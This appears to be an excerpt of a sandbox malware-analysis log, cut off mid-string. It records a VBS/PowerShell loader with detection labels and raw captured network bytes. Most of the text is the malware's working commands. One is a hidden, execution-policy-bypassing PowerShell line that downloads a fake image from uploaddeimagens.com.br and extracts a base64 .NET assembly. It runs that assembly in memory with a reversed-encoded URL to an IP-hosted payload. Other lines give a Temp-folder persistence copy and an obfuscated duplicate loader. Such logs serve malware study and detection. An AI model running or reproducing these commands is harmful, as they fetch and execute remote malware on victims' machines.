[System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LlJUSC9zd29kbml3LzQ1MS40Ni4zLjI5MS8vOnB0dGg=' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlc'))" |
Kaspersky | HEUR:Trojan.Script.Generic |
Data received | [ |
Data received | We: é OÓWãÁSñ¾À ÇÇ»üÚÐ*üDOWNGRD Îd¬±9¼¬Häx)ÍVµ¶ÕÐ;±ZÀ ÿ |
Data received | Q |
Data received | |
Data received | Ab8¶RUÝs25ïðLb`ðö±®}ax1HBÌ1ßÙ¯!³«Ìæ ¡âÓß]MÅË$6ëÌc G0E! ÍÛ»]׬Òfll¢éß*cyÈð@*vz ,®ß"h´Q»0x£lÒ©ÈQxÖåNrt |
Data received | |
Data received | |
Data received | |
Data received | |
Data received | 0 |
Data received | ¾]½¾V|J ÁdóàîSbýf8 Ö¿Ò;_Ͼ :LNÛðþZ^xSDê |
Data sent | y ue: ܧ°ùFQ*ôôZ]äÍ\lö ®¥6: / 5 ÀÀÀ À 2 8 4ÿ uploaddeimagens.com.br |
Data sent | F BA,.$Eôºáwá ÒcÜnê|-4 °3Ýö¸µ4lï ÃÌþÒêH&¾;v} 0&W~Í«?Æ 0k0·¸ß^~ÿ²{VC 9ص3m?²û¦}ïÓ Û÷ÖÊ"3y¨éÇzÉ°q |
parent_process | powershell.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_image.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LlJUSC9zd29kbml3LzQ1MS40Ni4zLjI5MS8vOnB0dGg=' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlc'))" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination C:\Windows\Temp\regasm.vbs -Force } | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVQByUHOWdGtçceGwUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBoUHOWdGtçceHQUHOWdGtçcedUHOWdGtçceBwUHOWdGtçceHMUHOWdGtçceOgUHOWdGtçcevUHOWdGtçceC8UHOWdGtçcedQBwUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBuUHOWdGtçceHMUHOWdGtçceLgBjUHOWdGtçceG8UHOWdGtçcebQUHOWdGtçceuUHOWdGtçceGIUHOWdGtçcecgUHOWdGtçcevUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBzUHOWdGtçceC8UHOWdGtçceMUHOWdGtçceUHOWdGtçcewUHOWdGtçceDQUHOWdGtçceLwUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceNUHOWdGtçceUHOWdGtçcevUHOWdGtçceDcUHOWdGtçceNUHOWdGtçceUHOWdGtçce5UHOWdGtçceC8UHOWdGtçcebwByUHOWdGtçceGkUHOWdGtçceZwBpUHOWdGtçceG4UHOWdGtçceYQBsUHOWdGtçceC8UHOWdGtçcebgBlUHOWdGtçceHcUHOWdGtçceXwBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceLgBqUHOWdGtçceHUHOWdGtçceUHOWdGtçceZwUHOWdGtçce/UHOWdGtçceDEUHOWdGtçceNgUHOWdGtçce5UHOWdGtçceDgUHOWdGtçceMUHOWdGtçceUHOWdGtçce4UHOWdGtçceDQUHOWdGtçceNQUHOWdGtçceyUHOWdGtçceDMUHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcedwBlUHOWdGtçceGIUHOWdGtçceQwBsUHOWdGtçceGkUHOWdGtçceZQBuUHOWdGtçceHQUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceTgBlUHOWdGtçceHcUHOWdGtçceLQBPUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceTgBlUHOWdGtçceHQUHOWdGtçceLgBXUHOWdGtçceGUUHOWdGtçceYgBDUHOWdGtçceGwUHOWdGtçceaQBlUHOWdGtçceG4UHOWdGtçcedUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceHcUHOWdGtçceZQBiUHOWdGtçceEMUHOWdGtçcebUHOWdGtçceBpUHOWdGtçceGUUHOWdGtçcebgB0UHOWdGtçceC4UHOWdGtçceRUHOWdGtçceBvUHOWdGtçceHcUHOWdGtçcebgBsUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceEQUHOWdGtçceYQB0UHOWdGtçceGEUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBVUHOWdGtçceHIUHOWdGtçcebUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçceuUHOWdGtçceEUUHOWdGtçcebgBjUHOWdGtçceG8UHOWdGtçceZUHOWdGtçceBpUHOWdGtçceG4UHOWdGtçceZwBdUHOWdGtçceDoUHOWdGtçceOgBVUHOWdGtçceFQUHOWdGtçceRgUHOWdGtçce4UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceUwB0UHOWdGtçceHIUHOWdGtçceaQBuUHOWdGtçceGcUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBCUHOWdGtçceHkUHOWdGtçcedUHOWdGtçceBlUHOWdGtçceHMUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBTUHOWdGtçceFQUHOWdGtçceQQBSUHOWdGtçceFQUHOWdGtçcePgUHOWdGtçce+UHOWdGtçceCcUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGUUHOWdGtçcebgBkUHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBFUHOWdGtçceE4UHOWdGtçceRUHOWdGtçceUHOWdGtçce+UHOWdGtçceD4UHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBUUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceB0UHOWdGtçceC4UHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceE8UHOWdGtçceZgUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceZQBuUHOWdGtçceGQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceTwBmUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBGUHOWdGtçceGwUHOWdGtçceYQBnUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceHMUHOWdGtçcedUHOWdGtçceBhUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçceZQUHOWdGtçcegUHOWdGtçceDUHOWdGtçceUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceCsUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceLgBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceYgBhUHOWdGtçceHMUHOWdGtçceZQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceTUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZwB0UHOWdGtçceGgUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBzUHOWdGtçceHQUHOWdGtçceYQByUHOWdGtçceHQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBTUHOWdGtçceHUUHOWdGtçceYgBzUHOWdGtçceHQUHOWdGtçcecgBpUHOWdGtçceG4UHOWdGtçceZwUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceQwBvUHOWdGtçceG4UHOWdGtçcedgBlUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBdUHOWdGtçceDoUHOWdGtçceOgBGUHOWdGtçceHIUHOWdGtçcebwBtUHOWdGtçceEIUHOWdGtçceYQBzUHOWdGtçceGUUHOWdGtçceNgUHOWdGtçce0UHOWdGtçceFMUHOWdGtçcedUHOWdGtçceByUHOWdGtçceGkUHOWdGtçcebgBnUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZQBkUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceUgBlUHOWdGtçceGYUHOWdGtçcebUHOWdGtçceBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBpUHOWdGtçceG8UHOWdGtçcebgUHOWdGtçceuUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQBdUHOWdGtçceDoUHOWdGtçceOgBMUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceB0UHOWdGtçceHkUHOWdGtçcecUHOWdGtçceBlUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcebUHOWdGtçceBvUHOWdGtçceGEUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGQUHOWdGtçceQQBzUHOWdGtçceHMUHOWdGtçceZQBtUHOWdGtçceGIUHOWdGtçcebUHOWdGtçceB5UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceVUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCcUHOWdGtçceRgBpUHOWdGtçceGIUHOWdGtçceZQByUHOWdGtçceC4UHOWdGtçceSUHOWdGtçceBvUHOWdGtçceG0UHOWdGtçceZQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceG0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcedUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceuUHOWdGtçceEcUHOWdGtçceZQB0UHOWdGtçceE0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCgUHOWdGtçceJwBWUHOWdGtçceEEUHOWdGtçceSQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçcedgBvUHOWdGtçceGsUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcebgB1UHOWdGtçceGwUHOWdGtçcebUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceWwBvUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBbUHOWdGtçceF0UHOWdGtçceXQUHOWdGtçcegUHOWdGtçceCgUHOWdGtçceJwBkUHOWdGtçceEgUHOWdGtçceaUHOWdGtçceUHOWdGtçcewUHOWdGtçceEwUHOWdGtçcebUHOWdGtçceBKUHOWdGtçceFUUHOWdGtçceUwBDUHOWdGtçceDkUHOWdGtçceegBkUHOWdGtçceDIUHOWdGtçceOQBrUHOWdGtçceGIUHOWdGtçcebQBsUHOWdGtçceDMUHOWdGtçceTUHOWdGtçceB6UHOWdGtçceFEUHOWdGtçceMQBNUHOWdGtçceFMUHOWdGtçceNUHOWdGtçceUHOWdGtçcewUHOWdGtçceE4UHOWdGtçceaQUHOWdGtçce0UHOWdGtçceHoUHOWdGtçceTUHOWdGtçceBqUHOWdGtçceEkUHOWdGtçceNQBNUHOWdGtçceFMUHOWdGtçceOUHOWdGtçceB2UHOWdGtçceE8UHOWdGtçcebgBCUHOWdGtçceDUHOWdGtçceUHOWdGtçceZUHOWdGtçceBHUHOWdGtçceGcUHOWdGtçcePQUHOWdGtçcenUHOWdGtçceCUHOWdGtçceUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceDIUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceHIUHOWdGtçceZQBnUHOWdGtçceGEUHOWdGtçcecwBtUHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce1UHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBDUHOWdGtçceDoUHOWdGtçceXUHOWdGtçceBXUHOWdGtçceGkUHOWdGtçcebgBkUHOWdGtçceG8UHOWdGtçcedwBzUHOWdGtçceFwUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceG0UHOWdGtçcecUHOWdGtçceBcUHOWdGtçceCcUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceaUHOWdGtçceB0UHOWdGtçceG0UHOWdGtçcebUHOWdGtçceBjUHOWdGtçceCcUHOWdGtçceKQUHOWdGtçcepUHOWdGtçceUHOWdGtçce==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UHOWdGtçce','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" | ||||||
parent_process | wscript.exe | martian_process | powershell.exe -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination C:\Windows\Temp\regasm.vbs -Force } | ||||||
parent_process | wscript.exe | martian_process | powershell -command "$Codigo = 'JUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVQByUHOWdGtçceGwUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBoUHOWdGtçceHQUHOWdGtçcedUHOWdGtçceBwUHOWdGtçceHMUHOWdGtçceOgUHOWdGtçcevUHOWdGtçceC8UHOWdGtçcedQBwUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBuUHOWdGtçceHMUHOWdGtçceLgBjUHOWdGtçceG8UHOWdGtçcebQUHOWdGtçceuUHOWdGtçceGIUHOWdGtçcecgUHOWdGtçcevUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBzUHOWdGtçceC8UHOWdGtçceMUHOWdGtçceUHOWdGtçcewUHOWdGtçceDQUHOWdGtçceLwUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceNUHOWdGtçceUHOWdGtçcevUHOWdGtçceDcUHOWdGtçceNUHOWdGtçceUHOWdGtçce5UHOWdGtçceC8UHOWdGtçcebwByUHOWdGtçceGkUHOWdGtçceZwBpUHOWdGtçceG4UHOWdGtçceYQBsUHOWdGtçceC8UHOWdGtçcebgBlUHOWdGtçceHcUHOWdGtçceXwBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceLgBqUHOWdGtçceHUHOWdGtçceUHOWdGtçceZwUHOWdGtçce/UHOWdGtçceDEUHOWdGtçceNgUHOWdGtçce5UHOWdGtçceDgUHOWdGtçceMUHOWdGtçceUHOWdGtçce4UHOWdGtçceDQUHOWdGtçceNQUHOWdGtçceyUHOWdGtçceDMUHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcedwBlUHOWdGtçceGIUHOWdGtçceQwBsUHOWdGtçceGkUHOWdGtçceZQBuUHOWdGtçceHQUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceTgBlUHOWdGtçceHcUHOWdGtçceLQBPUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceTgBlUHOWdGtçceHQUHOWdGtçceLgBXUHOWdGtçceGUUHOWdGtçceYgBDUHOWdGtçceGwUHOWdGtçceaQBlUHOWdGtçceG4UHOWdGtçcedUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceHcUHOWdGtçceZQBiUHOWdGtçceEMUHOWdGtçcebUHOWdGtçceBpUHOWdGtçceGUUHOWdGtçcebgB0UHOWdGtçceC4UHOWdGtçceRUHOWdGtçceBvUHOWdGtçceHcUHOWdGtçcebgBsUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceEQUHOWdGtçceYQB0UHOWdGtçceGEUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBVUHOWdGtçceHIUHOWdGtçcebUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçceuUHOWdGtçceEUUHOWdGtçcebgBjUHOWdGtçceG8UHOWdGtçceZUHOWdGtçceBpUHOWdGtçceG4UHOWdGtçceZwBdUHOWdGtçceDoUHOWdGtçceOgBVUHOWdGtçceFQUHOWdGtçceRgUHOWdGtçce4UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceUwB0UHOWdGtçceHIUHOWdGtçceaQBuUHOWdGtçceGcUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBCUHOWdGtçceHkUHOWdGtçcedUHOWdGtçceBlUHOWdGtçceHMUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBTUHOWdGtçceFQUHOWdGtçceQQBSUHOWdGtçceFQUHOWdGtçcePgUHOWdGtçce+UHOWdGtçceCcUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGUUHOWdGtçcebgBkUHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBFUHOWdGtçceE4UHOWdGtçceRUHOWdGtçceUHOWdGtçce+UHOWdGtçceD4UHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBUUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceB0UHOWdGtçceC4UHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceE8UHOWdGtçceZgUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceZQBuUHOWdGtçceGQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceTwBmUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBGUHOWdGtçceGwUHOWdGtçceYQBnUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceHMUHOWdGtçcedUHOWdGtçceBhUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHO